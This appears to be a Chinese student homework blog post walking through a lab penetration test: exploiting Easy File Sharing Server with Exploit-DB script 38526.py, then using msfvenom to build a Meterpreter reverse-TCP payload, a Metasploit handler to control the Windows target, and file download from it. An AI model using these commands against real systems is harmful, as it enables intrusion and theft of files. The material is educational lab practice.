网络渗透复现作业

  • 一、漏洞渗透测试

  • 1、靶机(Windows)安装

    easy file sharing server(efssetup_2018.zip),该服务存在漏洞。

  • 2、利用Nmap扫描发现靶机(Windows)运行了该服务。

  • 3.用searchsploit easy file sharing 指令(左边是漏洞渗透模块的名称,右边是所在的位置)

4.随机选取一个漏洞 eg选取38526.py,对应所在位置

python2  /usr/share/exploitdb/exploits/windows/remote/38526.py

我们可以输入指令

python2 /usr/share/exploitdb/exploits/windows/remote/38526.py 靶机ip 端口号

5.然后靶机上就运行了计算器

 

二、Metasploit应用

1、生成主控端、被控端。

在kali中输入命令

msfvenom -p windows/meterpreter/reverse_tcp lhost=ip地址 lport=端口号 -f exe -o /root/payload.exe

lport那里是端口号,root后面文件名可以自己设置,必须是exe可执行文件

会在kali中生成文件

2.启动主控端

终端输入msfconsole指令打开Metasploit

启动handler命令

口号:use exploit/multi/handler

设置payload

设置lhost参数

修改lport参数

输入exploit开始监听(要先将payload文件移到靶机运行)

3.获得靶机(Windows)控制权。

可输入指令load -l查询可以对靶机执行的指令 输入指令ls查看靶机桌面的文件

4.下载靶机上任意一个文件。

可使用指令download +文件名下载

  • 7
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值